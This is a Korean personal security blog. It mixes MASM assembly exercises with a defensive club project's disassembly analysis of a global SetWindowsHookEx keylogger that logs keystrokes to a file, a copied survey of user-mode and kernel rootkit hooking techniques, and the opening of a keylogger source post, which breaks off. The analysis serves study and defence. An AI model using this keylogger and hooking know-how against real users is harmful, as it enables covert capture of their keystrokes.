Programming/Assembly2012. 1. 23. 16:13

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 난수(Random) 생성



이 예제도 5.3.3 에 있는 두번째 테스트 프로그램입니다.

처음에는 10개의 부호 없는 정수를 무작위로 생성하고 그 다음에는 -50부터 +49 범위에 있는 10개의 부호 있는 정수를 생성합니다.

어셈블리어 - 난수 생성하기

 



  TITLE Link Library Test #2 (TestLib2.asm)

; Testing the Irvine32 Library procedures.

INCLUDE Irvine32.inc

TAB = 9 ; 탭을 출력하기 위한 Tab의 ASCII 값

.code
main PROC
call Randomize ; 뒤에서 사용할 Random 함수를 위해 Seed 설정. ( 이 함수를 호출하지 않으면 같은 값이 계속 나옴)
call Rand1                 ; Rand1 프로시저 호출
call Rand2                 ; Rand2 프로시저 호출
exit                          ; 종료
main ENDP

Rand1 PROC                     ; Rand1 프로시저 정의
; Generate ten pseudo-random integers. 10개의 부호 없는 정수 생성
mov ecx, 10 ; loop 10 times // ecx에 10을 넣어서 10번 반복되게 한다.

L1:                                   ; L1 루프 시작 부분 
call Random32 ;  Random32 함수 호출  - 무작위 int 생성 리턴값은 eax로 들어갑니다.
call WriteDec ;  WriteDec - eax에 있는 값을 출력해줍니다.
mov al, TAB              ; al에 Tab의 ASCII 값을 넣어줍니다.
call WriteChar        ; Tab의 ASCII 값을 출력합니다.
loop L1                     ; L1의 끝 - ecx가 0 이 아니라면 L1 의 처음 부분으로 돌아갑니다.

call Crlf                    ; 개행 
ret                            ; 리턴
Rand1 ENDP

Rand2 PROC                      ; Rand2 프로시저 정의
; Generate ten pseudo-random integers between -50 and + 49 - -50 ~ +45 에 해당하는 부호 있는 정수 생성
mov ecx,10         ; ecx에 10을 넣어서 반복문이 반복될 횟수 설정

L1:                                ; L1 시작 부분
mov eax, 100 ; 0-99
call RandomRange ; 무작위 int 형 생성 - 범위 안에서
sub eax, 50 ; 0 - 99 사이에서 생성 된 값에 50을 빼줍니다 
call WriteInt ; 연산 된 값을 출력해줍니다.
mov al, TAB ; Tab의 ASCII 값을 al에 넣어줍니다.
call WriteChar ; Tab 출력
loop L1                      ; L1의 끝 - ecx가 0이 아니라면 L1의 처음 부분으로 돌아갑니다.

call Crlf                     ; 개행
ret                            ; 리턴
Rand2 ENDP
END main 

저작자표시

'Programming > Assembly' 카테고리의 다른 글

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 문자열을 역순으로 배치하기  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] GetMSeconds를 이용한 성능 시험  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 5.3.3 라이브러리 테스트 프로그램  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어 5판]연습문제 풀이 4장  (0) 2012.01.23
Visual Studio 2010 MASM 환경 설정  (1) 2012.01.23
Posted by NullBr4in
Programming/Assembly2012. 1. 23. 16:02

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 5.3.3 라이브러리 테스트 프로그램



책에서 보다가 괜찮은 샘플소스가 있어서 첨부해봅니다.

전경색과 배경색을 바꾸고

배열을 16진수로 출력하고

부호 있는 정수에 대해 입력을 받아서

입력한 정수를 10진수, 16진수, 2진수로 출력하는 샘플 코드 입니다.




TITLE Library Test #1: Integer I/O (TestLib1.asm)

;Tests the Clrscr, Crlf, DumpMem, ReadInt,
;SetTextColor, WaitMsg, WriteBin, WriteHex,
; and WriteString procedures.

Include Irvine32.inc
.data
arrayD DWORD 1000h, 2000h, 3000h                ; DWORD 형 크기가 3인 배열 arrayD 생성
prompt1 BYTE "Enter a 32-bit signed integer:",0 ; 문자열 생성
dwordVal DWORD ?                                      ; DWORD 형 변수 dwordVal 생성

.code
main PROC
; Set text color to yellow text on blue background:
mov eax, yellow + (blue * 16)              ; 배경색을 blue로, 글씨색을 yellow로 설정하겠다는 것을 eax에 입력
call SetTextColor                               ; eax값을 인자로 가져가는 SetTextColor 함수 호출로 설정
call Clrscr ; 화면 초기화

; Display the array using DumpMem.
mov esi, OFFSET arrayD ; arrayD의 오프셋을 esi에 저장
mov ecx, LENGTHOF arrayD ; arrayD의 길이를 ecx에 저장
mov ebx, TYPE arrayD ; arrayD의 타입, 즉 DWORD를 ebx에 저장(4가 저장됩니다.)
call DumpMem ; memory 출력. 위에서 입력한 esi,ecx,ebx를 기준으로 출력합니다.
                                                                ; 함수들에 대해 자세한 내용은 따로 포스팅 하겠습니다. 
call Crlf ; 개행

; Ask the user to input a signed decimal integer.
mov edx, OFFSET prompt1                  ; "Enter a 32-bit signed integer: " 문자열의 오프셋을 edx에 저장
call WriteString                                   ; edx에 있는 문자열 출력 
call ReadInt ; integer 입력 받기
mov dwordVal, eax ; ReadInt는 eax로 받은 값이 리턴되기 때문에 받은 값을 dwordVal 변수에 저장

; Display the integer in decimal, hexadecimal, and binary.
call Crlf ; new line
call WriteInt ; 부호 있는 10진수로 출력
call Crlf
call WriteHex ; 부호 있는 16진수로 출력
call Crlf
call WriteBin ; 부호 있는 2진수로 출력
call Crlf
call WaitMsg ; "Press any key..." 문자열 출력 후 키 입력 대기

; Return console window to default colors.
mov eax, lightGray + (black * 16)         ; 작업이 끝났으면 실행창의 환경설정을 다시 돌려줍니다.
call SetTextColor                               ; 바로 위에서 적용한 검은색 바탕에 밝은 회색으로 설정
call Clrscr ; 화면 초기화
exit
main ENDP
END main

저작자표시

'Programming > Assembly' 카테고리의 다른 글

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 문자열을 역순으로 배치하기  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] GetMSeconds를 이용한 성능 시험  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 난수(Random) 생성  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어 5판]연습문제 풀이 4장  (0) 2012.01.23
Visual Studio 2010 MASM 환경 설정  (1) 2012.01.23
Posted by NullBr4in
Programming/Assembly2012. 1. 23. 14:02

[인텔 기반 컴퓨터를 위한 어셈블리 언어 5판]연습문제 풀이 4장



"인텔 기반 컴퓨터를 위한 어셈블리 언어 5판" 은 어제부터 시작한 어셈블리 교재입니다.

공부하면서 풀은 연습문제입니다.

1~4는 별로 필요가 없어보여서... 5~8번 문제만 풀었습니다.


5번 - 직접 오프셋 주소 지정

TITLE 4.7.5 eaxmple

;4.7.5-1
;5.1 직접 오프셋 주소지정


INCLUDE Irvine32.inc
.data
Uarray WORD 1000h, 2000h, 3000h, 4000h
Sarray SWORD -1, -2, -3, -4

.code
main PROC
movzx eax, Uarray
movzx ebx, (Uarray+2)
movzx ecx, (Uarray+4)
movzx edx, (Uarray+6)
call DumpRegs
exit
main ENDP
END main
  

5번 - 직접 오프셋 주소 지정 - 2
TITLE 4.7.5 eaxmple

; 4.6.5-2
;5.2 직접 오프셋 주소지정

INCLUDE Irvine32.inc
.data
Uarray WORD 1000h, 2000h, 3000h, 4000h
Sarray SWORD -1, -2, -3, -4

.code
main PROC
movsx eax, Sarray
movsx ebx, (Sarray+2)
movsx ecx, (Sarray+4)
movsx edx, (Sarray+6)
call DumpRegs
exit
main ENDP
END main 
 
6번 - 피보나치 수
TITLE 4.7.6 eaxmple

; 4.6.6
; Fibonacci
; 피보나치 수 12항 까지

INCLUDE Irvine32.inc
.data
first BYTE 1
second BYTE 0
sum BYTE ?

.code
main PROC

movsx ebx, first
movsx edx, second
mov ecx, 12
L1:
mov eax, ebx
add eax, edx
call DumpRegs

mov bl, dl
mov dl, al

loop L1
exit
main ENDP
END main
  
7번 - 산술식
TITLE 4.7.7 eaxmple

; 4.6.7
; 산술식
; EAX = -val2 + 7 - val3 + val1

INCLUDE Irvine32.inc
.data
val1 SDWORD 8
val2 SDWORD -15
val3 SDWORD 20

.code
main PROC
mov eax, val2 ; EAX = FFFFFFF1h
neg eax ; EAX = Fh
add eax, 7 ; EAX = 16h

mov ebx, val3 ; EAX = 16h, EBX = 14h
neg ebx ; EAX = 16h, EBX = FFFFFFECh

add eax, ebx ; EAX = 2h

add eax, val1 ; EAX = Ah

call DumpRegs
exit
main ENDP
END main
 


8번 - 문자열의 역방향 복사
TITLE 4.7.8 eaxmple

; 4.6.8
; 8. 문자열의 역방향 복사



INCLUDE Irvine32.inc
.data
source BYTE "This is the source string", 0
target BYTE SIZEOF source DUP('#')
.code
main PROC
xor esi,esi ; esi 초기화
mov esi, OFFSET source ; source 주소를 esi에 넣는다.
add esi, SIZEOF source ; esi가 source의 오프셋에 source 길이를 더한다.
dec esi ; 그럼 1 byte가 넘어가게 되는데 이걸 다시 빼준다.
xor edi, edi ; edi 초기화
mov edi, OFFSET target ; target 주소를 edi에 넣는다.
mov ecx, LENGTHOF source ; ecx(loop count)에 source의 길이를 넣는다.

L1: ; loop L1
mov al, [esi] ; [esi], 즉 source 주소지에 있는 값을 al 로 복사한다.
mov [edi], al ; al, 의 값을 [edi], target 주소이제 복사한다.
inc edi ; edi 주소를 1 증가시킨다.
dec esi ; esi 주소를 1 감소시킨다.
loop L1 ; L1 으로 돌아가라
mov esi, OFFSET target ; target 주소를 esi에 넣어라
mov ebx, 1 ; ebx에 1을 넣어라. DumpMem 에서 사용할 값 - byte format
mov ecx, SIZEOF target ; target의 크기(SIZE * LENGTH)를 ecx 에 넣어라.
call DumpMem ; DumpMem 호출.

exit
main ENDP
END main
 







이 중에서 8번은 약간 헤깔립니다..
뭔가 비효율적으로 코딩한거 같은데...
흠...........
 
저작자표시

'Programming > Assembly' 카테고리의 다른 글

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 문자열을 역순으로 배치하기  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] GetMSeconds를 이용한 성능 시험  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 난수(Random) 생성  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 5.3.3 라이브러리 테스트 프로그램  (0) 2012.01.23
Visual Studio 2010 MASM 환경 설정  (1) 2012.01.23
Posted by NullBr4in
Programming/Assembly2012. 1. 23. 01:58

Visual Studio 2010 MASM 환경 설정



리버싱을 공부하면서 계속 어셈블리어에 대한 기초가 약하다고 느꼈었는데 

이번에는 시간 내서 기초를 잡고 가기로 마음 먹었습니다.

먼저 설치 전에 Irvine library 를 설치해주세요

이건 첨부파일에 첨부해놨습니다.

Irvine.zip

AsmHighlighter1_5.vsix

같이 첨부된 AsmHighlighter1_5.vsix 파일은 Visual Studio 에서 asm 코딩 할 때 보기 좋게 색을 넣어줍니다.



Visual Studio 2010 에 MASM 설정하는 것으로 시작해 보겠습니다. 
 



1. 먼저 첨부 파일을 받아서 압축을 풀어줍니다. 저는 C:\Irvine 폴더에 압축을 풀었습니다.


2. Visual Studio 2010 을 키신후, File -> New -> Project 를 하여 새로운 Project 를 추가합니다.


3. 'Win32 Console Application" 을 선택해주시고 이름은 아무거나 넣어주시고 OK를 눌러주세요. 저는 "asmtest"라고 넣었습니다.


4. 처음에 뜨는 창에서 "Next"를 눌러줍니다.


5. "Empty project" 에 체크하여 빈 프로젝트를 생성합니다.


6. 프로젝트가 생성되었으면, 생성 된 프로젝트에서 마우스 오른쪽 버튼을 누르시고 "Build Customizations"를 선택해 줍니다.


7. 그림에서 보이는 부분처럼 masm 에 체크를 해줍니다.


8. 이제 소스 파일을 생성해봅시다. Source File 폴더에서 마우스 우측 버튼 누른 다음 Add->New Items 를 선택해줍니다.


9. 위와 같은 창이 뜨는데, 여기서 "Utility" 에 있는 "Text File"을 선택해주고 이름을 넣습니다. 여기서 주의할 점은 확장명은 ".asm"


10. 소스 추가가 끝나셨으면 다시 프로젝트를 누르시고 우측 버튼을 눌러서 "Properties"를 눌러줍니다.


11. "Configuration Properties"->"Linker"->"General" 순서대로 들어가시면 "Additional Library Directories"가 있습니다.
     여기에 아까 설치한 Irvine library의 경로를 넣어주시면 됩니다.


12. "Configuration Properties" -> "Linker" -> "Input" 으로 들어가신다음에 "Additional Dependencies" 에 
     "irvine32.lib" 를 맨 앞에 추가해주세요. 추가하시고 뒤에 ' ; ' <- 을 꼭 넣어주셔야 합니다.


13. " Configuration Properties" -> "Microsoft Macro Assembler" -> "General" 에 들어가보시면 "Include Paths"라고 있습니다.
     여기에도 Irvine library의 설치 경로를 넣어주시면 됩니다.


14. 드디어 설정이 끝났습니다! 책에 있는 예제를 넣고 컴파일 해봅니다.


15. 정상적으로 작동되는 것을 확인합니다!! 

수고하셨습니다! 
저작자표시

'Programming > Assembly' 카테고리의 다른 글

[인텔 기반 컴퓨터를 위한 어셈블리 언어] 문자열을 역순으로 배치하기  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] GetMSeconds를 이용한 성능 시험  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 난수(Random) 생성  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어] 5.3.3 라이브러리 테스트 프로그램  (0) 2012.01.23
[인텔 기반 컴퓨터를 위한 어셈블리 언어 5판]연습문제 풀이 4장  (0) 2012.01.23
Posted by NullBr4in
프로젝트/창과 방패2012. 1. 22. 17:37

김성현군이 만든 초간단키로거 분석



성현이가 만든 키로거를 간단하게 훑어보고 올린 제목의 "간단한 키로거"라는 거에서 

proja.exe에서 hook.dll 을 로드하여 SetWindowsEx 함수를 이용하여 전역 후킹하는 것으로 예상 함.
(타겟 프로그램이 따로 없는듯 하기 때문.)

proja.exe 파일과 hook.dll 파일, 두개의 파일로 이루어진 키로거


- proja.exe

분석 중, 0040BAE0h 에 위치부터 성현이가 만든 키로거의 핵심 루틴으로 보이는 것을 발견.

함수명을 확인한 결과, 

.text:0040BB13 mov     esi, esp
.text:0040BB15 push    offset aHook_dll                ; "hook.dll"
.text:0040BB1A call    ds:LoadLibraryA

위와 같은 부분을 찾았으며, "hook.dll" 을 로드하는것을 볼 수 있다.
그리고 해당 루틴안에는 아마도 분기문으로 로드가 실패했을때는
 "hook.dll을 로드할 수 없습니다."라는 MessageBox 출력 후 프로세스 종료

만약 성공시에는 계속 진행되는데,

.text:0040BB67 push    offset aGetmsgproc              ; "GetMsgProc"
.text:0040BB6C mov     edx, dword_4237AC
.text:0040BB72 push    edx
.text:0040BB73 call    ds:GetProcAddress

을 보면 "hook.dll"에서 export 한 함수인 GetMsgProc함수 주소를 가져오는 것을 볼 수 있다. 

.text:0040BB83 cmp     dword ptr [ebp-4], 0
.text:0040BB87 jnz     short loc_40BBCF
.text:0040BB89 mov     esi, esp
.text:0040BB8B push    0
.text:0040BB8D push    offset unk_420060
.text:0040BB92 push    offset unk_421008
.text:0040BB97 mov     eax, [ebp+8]
.text:0040BB9A push    eax
.text:0040BB9B call    ds:MessageBoxA
.text:0040BBA1 cmp     esi, esp
.text:0040BBA3 call    __chkesp
.text:0040BBA8 mov     esi, esp
.text:0040BBAA mov     ecx, dword_4237AC
.text:0040BBB0 push    ecx
.text:0040BBB1 call    ds:FreeLibrary
.text:0040BBB7 cmp     esi, esp
.text:0040BBB9 call    __chkesp
.text:0040BBBE mov     esi, esp
.text:0040BBC0 push    1
.text:0040BBC2 call    ds:ExitProcess

그 이후 역시 위와 같이 분기문을 통해 함수 주소를 가져오는것이 실패하면 메시지박스 출력 후 
프로세스를 종료하는 것을 볼 수 있다.

만약 가져오는데 성공 했다면 아래와 같이 성현이가 사용한 후킹 기법의 핵심이라 볼 수 있는
SetWindowsHookEx 함수를 이용해 후커를 설치하는 부분을 볼 수 있다.

.text:0040BBCF mov     esi, esp
.text:0040BBD1 push    0
.text:0040BBD3 mov     edx, dword_4237AC
.text:0040BBD9 push    edx
.text:0040BBDA mov     eax, [ebp-4]
.text:0040BBDD push    eax
.text:0040BBDE push    3
.text:0040BBE0 call    ds:SetWindowsHookExA

SEtWindowsHookEx 를 사용하여 지역 후킹 또는 전역 후킹을 하는데,
디버거로 분석하기전 실행을 통해 봤을때는 전역 후킹으로 보였다.
타겟 프로그램이 따로 없어보였기 때문.

직접 이 부분을 디버거로 호출 부분의 스택 부분을 본다면,

000000000018F86C  0038100500000003
000000000018F874  0000000000380000   "hook.dll"
000000000018F87C  0040100500000001
000000000018F884  CCCCCCCC00000000

이처럼 나와 있다.(64비트라 좀...)

이것과 같이 볼 것은 SetWindowsHookEx 함수 정보인데,

HHOOK WINAPI SetWindowsHookEx( __in int idHook,
__in HOOKPROC lpfn,
__in HINSTANCE hMod,
__in DWORD dwThreadId);
위와 같다.



그럼 스택을 이용해서 성현이가 작성한 코드에서 호출 한 것을 봐보면,



SetWindowsHookEx(3, GetMsgProc의 주소, 1, 0); 와 같은 방법으로 호출 한 것을 알 수 있다.



먼저 첫번째 인자는
WH_GETMESSAGE
                3

Installs a hook procedure that monitors messages posted to a message queue. For more information, see the GetMsgProc hook procedure.

 
즉 메시지 큐로 보내는 메시지 전체를 후커로 보낸다는 의미이고, 뒤에 설명을 보면 GetMsgProc 훅 프로시저에서 사용하는 걸 유추해 볼 수 있다.




그다음 두번째 인자는

후커, 즉 훅 프로시저의 포인터이고, 이건 위에서 얻은 GetProcAddress 함수의 리턴 값을 넣으면 될 것 같다.

세번째는 LoadLibrary 함수를 통해 얻은 "hook.dll" 핸들 값을 넣어주면 되고,

네번째는 후킹할 ThreadId 를 넣어주면 되는데, 특정 ThreadId 를 넣을 시 지역 후킹이 되고, 

0을 넣을 경우 전역 후킹이 되는데, 여기서 성현이는 전역 후킹을 사용했다.




계속해서 코드를 봤더니 역시 분기문을 통해 실패할 경우 메시지창을 띄우고 종료, 아닐 경우 다음으로 계속 진행되는데

여기서는 더이상 쓸모 있는 부분이 아니라 생략한다.










-hook.dll
자 이제 hook.dll 을 분석해보자.

일단 proja.exe 를 분석해서 알아낸 결과 hook.dll 에서 export 하는 함수인 GetMsgProc 함수를 찾아서 접근 해보았다.




GetMsgProc의 분기문 전까지 내용은 아래와 같다.




push    ebp

mov     ebp, esp

sub     esp, 48h

push    ebx

push    esi

push    edi

lea     edi, [ebp+var_48]

mov     ecx, 12h

mov     eax, 0CCCCCCCCh

rep stosd

mov     eax, [ebp+arg_8]

cmp     dword ptr [eax+4], 100h

jnz     short loc_100010AB





마지막에서 두번째 줄인, cmp dword ptr [eax+4], 100h 부분은 후킹한 메시지의 wParam 값을 확인 후 분기하는거 같은데,
일단 키로거이기 때문에 100h은 WM_KEYDOWN 이나 KEY와 관련된 값이란걸 유추 할 수 있다.
확인 하기 위해 msdn 에 검색해보면
#define WM_KEYDOWN                      0x0100

위와 같이 WM_KEYDOWN 이 0x0100 으로 가져온 메시지에서 wParam이 WM_KEYDOWN 메시지인지 확인 한 후 분기하는걸 알 수 있다.




mov     esi, esp

push    0               ; hTemplateFile

push    80h             ; dwFlagsAndAttributes

push    4               ; dwCreationDisposition

push    0               ; lpSecurityAttributes

push    0               ; dwShareMode

push    40000000h       ; dwDesiredAccess

push    offset FileName ; "c:\\test.txt"

call    ds:CreateFileA


WM_KEYDOWN 일 경우엔, 처음에 CreateFile 함수를 통해 c:\test.txt의 파일 포인터를 가져오는 것을 알 수 있다.

이것으로 키값을 proja.exe의 윈도우에 출력이 아니라 해당 파일에 출력하는 것이라 유추 해 볼 수 있다.




다음으로 




push    2               ; dwMoveMethod

push    0               ; lpDistanceToMoveHigh

push    0               ; lDistanceToMove

mov     ecx, [ebp+hObject]

push    ecx             ; hFile

call    ds:SetFilePointer





SetFilePointer 함수를 사용하는데, msdn에 찾아보았다.

DWORD SetFilePointer(   HANDLE hFile,   

                        LONG lDistanceToMove,   

                        PLONG lpDistanceToMoveHigh,   

                        DWORD dwMoveMethod); 

This function moves the file pointer of an open file. A RAPI version of this function exists, called CeSetFilePointer (RAPI).



설명을 읽어보면 파일포인터를 이동하는 함수란걸 알 수 있다.
아마도 이걸 사용한거면 새로 입력 받는 키 값은 파일에서 맨 마지막에 붙이는 것 같은데,, 한번 봐보자,



첫번째 인자값엔 c:\test.txt 파일의 핸들을 넣었고,
두번째 인자값엔 옮길 위치를 넣는데, 0으로 지정한 것으로 보아 뒤에 나오는 네번째 인수에서 결정 할 것 같다.
세번째 인자는 Not supported; must be NULL or point to a value of zero. ,, 파일의 크기가 2기가 이상일 경우 사용하는것인데 여기선 0으로, 즉 사용 안함
네번째 인자는 [in] Starting point for the file pointer move. The following table shows possible values for this parameter.,, 파일 포인트 이동 시작 지점을 정해주는 것이다.
0x0 FILE_BEGIN - Indicates that the starting point is zero or the beginning of the file.
0x1 FILE_CURRENT - Indicates that the starting point is the current value of the file pointer.
0x2 FILE_END - Indicates that the starting point is the current EOF position.
이렇게 세가지가 있으며 0x2로 되어 있으니 파일 포인트 시작지점을 맨마지막으로 설정한다.



push 0 ; lpOverlapped

lea edx, [ebp+NumberOfBytesWritten]

push edx ; lpNumberOfBytesWritten

push 1 ; nNumberOfBytesToWrite

mov eax, [ebp+arg_8]

add eax, 8

push eax ; lpBuffer

mov ecx, [ebp+hObject]

push ecx ; hFile

call ds:WriteFile





그다음 나오는게 위의 WriteFile 함수 호출부분인데, 이건 받은 메시지에서 눌린 키값을 파일에 써주는 부분이다.



mov edx, [ebp+hObject]

push edx ; hObject

call ds:CloseHandle





그다음 나오는게 CloseHandle 호출이며 이 함수는 파일 핸들을 닫아주는 것으로 보인다.



이로써 분석은 끝나고,,
막는 방법은 여러가지를 생각 할 수 있다.
솔직히 쉽게는 해당 프로세스의 패턴을 프로그램에 등록해서 막을 수는 있고 가장 쉬운 방법이지만
프로그램을 재컴파일하여 만약 패턴부분이 바뀐다면 사용 할 수 없는 방법이다. (지속적인 업데이트 필요)



하지만 이번 프로젝트에서는 저런 방식(키로거의 패턴을 뽑아내서 해당 프로그램 차단 방식)을 하려는게 아니니까,,



원래는 현재 작업 중인 프로젝트가 있는데 막바지라 진행 중이던 프로젝트를 끝마치고 방어 프로그램을 제작해서 올리려고 했는데
모처럼 창과방패 프로젝트에서 처음 나온 결과물이니 최대한 빨리 답변 해주고 싶어서 이렇게 일단 보고서라도 만들었다.
현재 진행중인 프로젝트는 1~2틀 내로 끝날 것 같다.
진행중인 프로젝트가 끝나면 성현이의 키로거 전용 탐지기가 아니라, Message 를 이용한 hooking 을 봉쇄하는 프로그램을 만들어서 업로드 하겠다.



-------------------------------------------------------------------------------------



해당 글은 분석 했을 당시 동아리 게시판에 올렸던 글입니다.



저때 진행 중이었던 작업이 d3d hooking 분석 이였고, 지금은 그 작업을 끝내고 방패프로그램을 만드는 중입니다~ 

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    


  
'프로젝트 > 창과 방패' 카테고리의 다른 글

  

    

      첫번째 방패 - 첫번째 키로거  (19)
      2012.01.22
    

    

      창과 방패 프로젝트란..  (0)
      2012.01.21
    

  










							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
                    
				
프로젝트/D3D Hooking2012. 1. 22. 16:56

				

				

					

						

							
Hooking의 종류

						

						

						
							
							
							




								            



            
창과 방패 및 d3d hooking 분석 작업을 하면서 hooking 의 방어 방법에 많은 생각을 하게 되었습니다.

먼저 방어 방법에 앞서 hooking 에는 무슨 종류가 있는지, 또 어떤 방법으로 후킹 하는지에 대해 알아보고

막을 수 있는 방법에 대해 연구해보도록 하겠습니다.

먼저 웹서핑을 통해 정리가 깔끔하게 되어있는 후킹의 분류에 대해 퍼왔습니다.



API Hooking은 크게 유저모드와 커널모드 두가지로 나뉜다.


 


 


User-Mode Hooking
 


    

  • IAT(Import Address Table) Hooking: IAT 에 적혀있는 API 의 주소를 자신의 함수주소로 바꾸고 자신의 함수 끝에 다시 원래 API 주소로 돌려주는 방식. 가장 일반적으로 바이러스에서 사용하는 기법.

    • 

  • Inline Function Hooking (Detour Hooking): 사용할 API 의 첫 5바이트를 자신의 함수주소로 Jmp 하는 코드로 바꾸고 자신의 코드에서 다시 원래 API 의 바뀐 코드를 수정해주고 API 시작위치로 돌려주는 방식. IAT 후킹보다 지능적이여서 찾아내기가 쉽지 않다. 요새 많이 등장한다.


 


Kernel-Mode Hooking (루트킷)
 


    

  • SSDT(System Service Descriptor Table Modification): SSDT 가 가리키는 주소를 후킹 함수의 주소로 바꾸고 그 함수 호출후 다시 원래 커널 API 의 주소로 돌려주는 기법. 50% 이상의 루트킷이 사용하는 기법. 이런 기법은 프로세스, 파일의 은폐에 많이 사용됨.

    • 

  • DKOM(Direct Kernel Object Modification): 커널 Object 를 직접 조작해서 실행되는 프로세스, 스레드, 서비스, 포트, 드라이버 및 핸들의 Entry 를 실행리스트(PsActiveProcessHead, PsActiveModuleHead....)에서 감추는 기법.

    • 

  • SYSENTER: 유저모드에서 시스템 호출로 넘어갈때 INT 2E(for Windows 2000)/ SYSENTER 를 사용하게 되는데 호출후 시스템 서비스의 핸들러는 IA32_SYSENTER_EIP 라는 레지스터리에 저장된다. 커널 드라이버를 설치하여 해당 값을 수정하여 루트킷을 호출하고 다시 원래 값으로 돌려주는 기법.

    • 

  • Filter Device Drivers: 시큐리티 제품의 하단에 filter device driver 로 등록하는 기법이다. 부트 타임에 로드됨으로써 다른 어떤 안티바이러스 제품보다 먼저 실행된다.

    • 

  • Runtime Detour Patching: 커널 메모리를 직접 조작함으로써 그 메모리의 포인터가 루트킷을 가르키게 함으로써 커널 함수들을 후킹하는 기법. 예를 들면 Exception 을 일으키고 Exception Handle 을 컨트롤하는 IDT 레지스터를 자신을 가리키는 주소로 써줌으로써 후킹목적을 달성한다.

    • 

  • IRP table Modification: 디바이스 드라이버가 네트웍 패킷을 처리하거나 파일을 쓸때 사용하는 I/O Request Packets을 제어하는 Dispatch Routine 은 DEVICE_OBJECT 구조체에 저장된다. 바이러스에서 사용하는 루트킷은 IoGetDeviceObjectPointer 란 API를 사용하여 DEVICE_OBJECT 구조체에서 DRIVER_OBJECT 의 위치를 선정해줄수 있다. 즉 다른 Original Driver Call 이 일어나기 전에 자신의 루트킷을 먼저 실행하여 Call 결과를 조
    작한다.
     
출처 : http://cafe.naver.com/cheatenginekorea.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=25962

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    


  
'프로젝트 > D3D Hooking' 카테고리의 다른 글

  

    

      Direct3D Hooking 분석 해봤습니다.  (13)
      2012.01.20
    

  










							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
                    
				
이야기/잡담2012. 1. 22. 00:31

				

				

					

						

							
블로그 처음 시작해봅니다..

						

						

						
							
							
							




								            



            
제겐 디자인 감각과 글쓰기 재능이 워낙 없어서..




블로그의 디자인과 글들이 질이 좋지 않습니다.....





그러니까.. 



더 열심히 해서 좋고, 고급인 정보들에 대해 열심히 연구해서 열심히 공유하겠습니다~

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    


  
'이야기 > 잡담' 카테고리의 다른 글

  

    

      다시 시작..  (0)
      2012.07.09
    

    

      블로그 운영에 대한 간단한 글입니다..  (0)
      2012.02.10
    

  










							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
                    
				
이야기/계획2012. 1. 22. 00:30

				

				

					

						

							
겨울 방학 계획

						

						

						
							
							
							




								            



            
1월 22일 ~ 3월 1일




1. Assembly 기초 공부 

2. Windows 구조 공부

3. WinDBG 공부

4. 윈도우 디바이스 드라이버 공부

5. Windows 구조 공부 


6. ring 3 에서의 hooking 에 대해 조사 및 연구하여 탐지 및 방어 하는 프로젝트

 
 - 창과 방패 키보드 보안

 - 각종 후킹 방법 




7. d3d hooking 의 방어법 연구

 - 현존하는 d3d hooking 방어 방어 및 탐지 




8. kernel 수준에서 hooking 에 대해 조사 및 연구하여 탐지 및 방어 하는 프로젝트
 - 창과 방패 키보드 보안




9. 악성 코드, 게임봇, 게임 매크로, 게임 오토 에 대해 조사 및 연구하여 탐지 및 방어, 그리고 분석 프로젝트.

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    







							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
                    
				
프로젝트/창과 방패2012. 1. 22. 00:24

				

				

					

						

							
첫번째 방패 - 첫번째 키로거

						

						

						
							
							
							




								            



            
저는 처음부터 방어쪽을 만들고 싶었기에 다른 팀원이 키로거를 제작하기를 기다렸습니다. 

드디어 프로젝트 팀원 중 김성현군이 첫번째 키로거를 만들어서 업로드 했습니다. 

분석 결과 SetWindowsHookEx 함수를 사용하여 전역 훅을 설치, 키로거를 제작 하였습니다.

소스는 방패쪽에서 분석과 방어 프로그램을 제작하면 업로드 하는 식으로 진행 됩니다. 

단, 분석 및 연구 목적으로만 사용하시기 바랍니다. 이것을 불법으로 사용하여 일어나는 책임은 사용자에게 있습니다.

아래 소스코드와 초간단 키로거 실습 프로그램은 FLAG 동아리 김성현군이 제공해주었습니다.



원래는 방패프로그램 제작 이후에 소스 공개하는게 원칙이지만 이번만은 사정이 있어서 

방패측에서 분석만 끝내고 창 프로그램의 소스를 공개했습니다.








proja.exe 소스코드
#include <windows.h>
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);


HINSTANCE g_hInst;


LPCTSTR lpszClass = TEXT("Hacked by gh0st");
//hInstance 프로그램의 인스턴스핸들

//nCmdShow 프로그램이 실행될 형태이며 최소화,보통 모양 등이 전달

// APIENTRY 는 윈도우즈의 표준 호출규약인 __stdcall 사용
//아래의 Winmain 함수는 일반 C언어에서의 main과 같은 역할을 한다. 즉, 프로그램이 가장 

// 먼저 실행되는 함수이다. 


//  Winmain 함수의 인자가 복잡한데
//간단히 설명해서 hInstance는 프로그램 자체의 포인터이고, hPrevInstance는 해당 프로그램이 

//동시에 몇개가 실행되었는지 파악할 때 사용하는 변수
